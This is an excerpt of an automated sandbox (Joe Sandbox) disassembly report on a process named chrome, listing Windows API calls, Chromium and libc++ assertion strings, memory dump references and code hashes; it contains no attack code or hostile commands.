                                                    • Opcode Fuzzy Hash: 12f712b625931c0d7614d8d6798d5747db5da644b42b86c716f082b5e98e5e34
                                                    • Instruction Fuzzy Hash: 4221C374A0025D9FCB249F65D8986BF7BE9EF44300F18482DE146EB240EB24AD88C7B1
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00DEF20A
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00DEF1FB
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00DEF219
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 4218353326-2665691617
                                                    • Opcode ID: a722634ebc1d0cc4ea4e4cb9aea509fe4ddac9021e15a48bfbcd0639df46c011
                                                    • Instruction ID: 8748c87f33f53ed7d29bbac0115333b5ea044f575a790a9f0267f490d1fa108c
                                                    • Opcode Fuzzy Hash: a722634ebc1d0cc4ea4e4cb9aea509fe4ddac9021e15a48bfbcd0639df46c011
                                                    • Instruction Fuzzy Hash: 23715F75B0025A8FCB18EB6AC9919BEB7F2FF84310B288029D455E7791D730ED41CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DA8047
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,?,000000FF), ref: 00DA8170
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: 19691db12cb54da4495800892d2e408e96362b174c5300c50d0ee0b810d9500c
                                                    • Instruction ID: d6d5150b39bc9b819e09f59406b1cea894dfabc7afe9e12f58360cbca2b66758
                                                    • Opcode Fuzzy Hash: 19691db12cb54da4495800892d2e408e96362b174c5300c50d0ee0b810d9500c
                                                    • Instruction Fuzzy Hash: BB51D0716047019FC314CF29C880A6AFBE5FF89324F15CA2DF99997295DB30E946CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,00000000,?,?,00D52E86,00000000,00000000), ref: 00D53136
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,00000000,?,?,00D52E86,00000000,00000000), ref: 00D53155
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at,?,?,?,?,?,00000000,00000000,?,?,00D52E86,00000000,00000000), ref: 00D53283
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D532B8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 1678258262-2888085009
                                                    • Opcode ID: 36e34df80c42a2b701e80f88bec6609f1b37a7a0217074086bcad836bd4c93c4
                                                    • Instruction ID: 4b27d3f9f53b17cd28b78efcdd40969c9e0740ff17ddc49577b80bd520b59c0a
                                                    • Opcode Fuzzy Hash: 36e34df80c42a2b701e80f88bec6609f1b37a7a0217074086bcad836bd4c93c4
                                                    • Instruction Fuzzy Hash: 29514CB5A006059FCF14CF69D880969BBF0FF48391B14812AEC59EB351D730EE59CBA5
                                                    APIs
                                                      • Part of subcall function 00D43410: ResetEvent.KERNEL32(?), ref: 00D4342B
                                                      • Part of subcall function 00D43410: ResetEvent.KERNEL32(?,00000001), ref: 00D434AF
                                                      • Part of subcall function 00D43410: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D434B9
                                                      • Part of subcall function 00D43410: ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D434FB
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00D423A2), ref: 00D432A7
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D432DD
                                                    Strings
                                                    • ..\..\chrome\app\exit_code_watcher_win.cc, xrefs: 00D4333F
                                                    • StartWatching, xrefs: 00D43344
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireEventReleaseReset
                                                    • String ID: ..\..\chrome\app\exit_code_watcher_win.cc$StartWatching
                                                    • API String ID: 2082994738-1005533984
                                                    • Opcode ID: e99fd5e0da6117f6f6b6f2e8299bd753c47467f6b7afbe81f950afc61ec277f6
                                                    • Instruction ID: 4109de6f6a22f100d83f166b1b218d5ff0646826845b2164bff7fdf97e884989
                                                    • Opcode Fuzzy Hash: e99fd5e0da6117f6f6b6f2e8299bd753c47467f6b7afbe81f950afc61ec277f6
                                                    • Instruction Fuzzy Hash: F351A4706007048FC720DF29D889A56BBE4FF48304B15496DE49A9B762EB70F945CFA1
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6B85
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EF10F0), ref: 00DF6BB0
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF10F0), ref: 00DF6BF1
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DF6D46
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at
                                                    • API String ID: 135963836-4189810390
                                                    • Opcode ID: b057fb5dc046e15078fcde55c579eedfb7d97a518c6cc6dc39ceda973ca9e809
                                                    • Instruction ID: 6006dd982deecc537d7e414a5fb4015c3fdf587c0147a0853b1291977f3f0adb
                                                    • Opcode Fuzzy Hash: b057fb5dc046e15078fcde55c579eedfb7d97a518c6cc6dc39ceda973ca9e809
                                                    • Instruction Fuzzy Hash: 3751B0709047858BD321CF28C880776BBE4FF95304F159A6EE9DA97352DB70E584CB62
                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000000,00000000), ref: 00D82B92
                                                    Strings
                                                    • GetCurrentDirectoryW, xrefs: 00D82B41
                                                    • ..\..\base\files\file_util_win.cc, xrefs: 00D82B3C
                                                    • ScopedBlockingCall, xrefs: 00D82C90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: ..\..\base\files\file_util_win.cc$GetCurrentDirectoryW$ScopedBlockingCall
                                                    • API String ID: 1611563598-3482229333
                                                    • Opcode ID: 2c09cc9b18e8d2fef68ef66fb6365ffb9e1fde7e925ac6adf34570d1b095934c
                                                    • Instruction ID: d9098ef1a0d7c97950bae4106432ff519f68b8c49dfc7f02df495e061250382e
                                                    • Opcode Fuzzy Hash: 2c09cc9b18e8d2fef68ef66fb6365ffb9e1fde7e925ac6adf34570d1b095934c
                                                    • Instruction Fuzzy Hash: 9541D5B19043459FD710EF24DC85A6FB7E4EF84740F04892DF8D5A7251E774AA4887A3
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,00D8395C,?,00000000,?,?,?,?,00E8179B), ref: 00D413E0
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00D8395C,?,00000000,?,?,?,?,00E8179B), ref: 00D41410
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ..\..\base\threading\thread.cc$StopSoon
                                                    • API String ID: 17069307-4240870308
                                                    • Opcode ID: da36a3def254268024d8aba40b2fa1537abf718a82b29dc73db0c75630fb0c18
                                                    • Instruction ID: 1dfa479e4246cfd2572d87383e452139ea86f8b07ba925bba8457fdd123945ac
                                                    • Opcode Fuzzy Hash: da36a3def254268024d8aba40b2fa1537abf718a82b29dc73db0c75630fb0c18
                                                    • Instruction Fuzzy Hash: 6641D3757003448FC710DF29D88492ABBE5FF88714F09495DE85A9B352E770E945CBA2
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E71507
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E71500
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E7150E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 4218353326-2665691617
                                                    • Opcode ID: 92edfb2b44d1c267c1520ea297fe121bb5797594bc25909bf9a1d975d7b223c4
                                                    • Instruction ID: 41ee9de64b8182acc647d135a45e7ffe7511dae9b56aaa1d02e48cdb6dc10760
                                                    • Opcode Fuzzy Hash: 92edfb2b44d1c267c1520ea297fe121bb5797594bc25909bf9a1d975d7b223c4
                                                    • Instruction Fuzzy Hash: DC31ECF1E0031C5FDB24DB64EC81BAA77B5AB84318F0494E9E51D77382E6309E85CBA5
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32 ref: 00D6E393
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID: ..\..\third_party\crashpad\crashpad\client\crash_report_database_win.cc$: not a directory$GetFileAttributes
                                                    • API String ID: 3188754299-1182343664
                                                    • Opcode ID: ea962536e897991660ae1b2f5acf389e6f0cd1b579a5d7d127fbe2f65f045f85
                                                    • Instruction ID: 6e15b082533efc1dcb72da19f6a18a33ee2d9ce9fd26332a3254fd39ce8b9f2b
                                                    • Opcode Fuzzy Hash: ea962536e897991660ae1b2f5acf389e6f0cd1b579a5d7d127fbe2f65f045f85
                                                    • Instruction Fuzzy Hash: D121F5B4B4035827EA1076656C4BFAE37599F81705F081474FA09BB2C3EAB5A9888662
                                                    APIs
                                                    • GetFileSizeEx.KERNEL32(00000000,?,00000000,00000000), ref: 00D32AD4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: FileSize
                                                    • String ID: ..\..\base\files\file_win.cc$GetLength$ScopedBlockingCall
                                                    • API String ID: 3433856609-1252741873
                                                    • Opcode ID: 5163468e8511f77d2d2b93129a8c4d66705f6129798d9ffe06bd22b51e413400
                                                    • Instruction ID: a83e7cf2bdf0841751312ac7da1d18b377aa4aa224959f95c1ad12acd141c8cc
                                                    • Opcode Fuzzy Hash: 5163468e8511f77d2d2b93129a8c4d66705f6129798d9ffe06bd22b51e413400
                                                    • Instruction Fuzzy Hash: E121D8B1A143549FD7009F19DC8296BB7E4EFC9750F14462AF8C5D7241EBB0990987A2
                                                    APIs
                                                    • UnmapViewOfFile.KERNEL32(?,00000000,?,?,00000001,?,00D325CE,?,?,?,?,?,?,?,?,00D324EF), ref: 00D42A22
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000001,?,00D325CE,?,?,?,?,?,?,?,?,00D324EF), ref: 00D42A86
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D42A92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressFileHandleModuleProcUnmapView
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 3224599007-1090674830
                                                    • Opcode ID: 44e41cfce4a682db9377f7782dbb0152bd68cbc87bc3e16740a316ecf037b74e
                                                    • Instruction ID: 38f19ab5dc6bfec466b868eb6b921b594c20b4014b584d8a5701abebc5c83068
                                                    • Opcode Fuzzy Hash: 44e41cfce4a682db9377f7782dbb0152bd68cbc87bc3e16740a316ecf037b74e
                                                    • Instruction Fuzzy Hash: 291193702003409FDB34AB26DC4A73A7BE5FB48301F580929F546E72A1DB71E805CB71
                                                    APIs
                                                    • LockFileEx.KERNEL32(?,850CC483,00000000,-00000001,-00000001,?), ref: 00D758BF
                                                    • GetLastError.KERNEL32 ref: 00D758DF
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D75912
                                                    • LockFileEx, xrefs: 00D75924
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastLock
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$LockFileEx
                                                    • API String ID: 1811722133-445818742
                                                    • Opcode ID: 0614b67fbb4cd0cd151fabb7269c57fea974694feb0a21bbe0b846df2ef14640
                                                    • Instruction ID: c7a36ba5da3b6c7634d9840a86f54d8211e26427300bde297b4e797606cb7d99
                                                    • Opcode Fuzzy Hash: 0614b67fbb4cd0cd151fabb7269c57fea974694feb0a21bbe0b846df2ef14640
                                                    • Instruction Fuzzy Hash: EA113830E0036867D7349B62AC45FBB777DEBC5700F04819AF8097B285EA745D88C7A2
                                                    APIs
                                                    • SetCurrentDirectoryW.KERNEL32(?,00000000,00000000), ref: 00D4172F
                                                    Strings
                                                    • SetCurrentDirectoryW, xrefs: 00D416FC
                                                    • ..\..\base\files\file_util_win.cc, xrefs: 00D416F7
                                                    • ScopedBlockingCall, xrefs: 00D41765
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: ..\..\base\files\file_util_win.cc$ScopedBlockingCall$SetCurrentDirectoryW
                                                    • API String ID: 1611563598-623993952
                                                    • Opcode ID: 951a7d850f4c2bbac0f021999a47352056103bc1c85eb36f8a9b940f3894f1dd
                                                    • Instruction ID: 7604f48d892eab07210dae69ec89917be3a00048d90f8be8c29946bfe88a807c
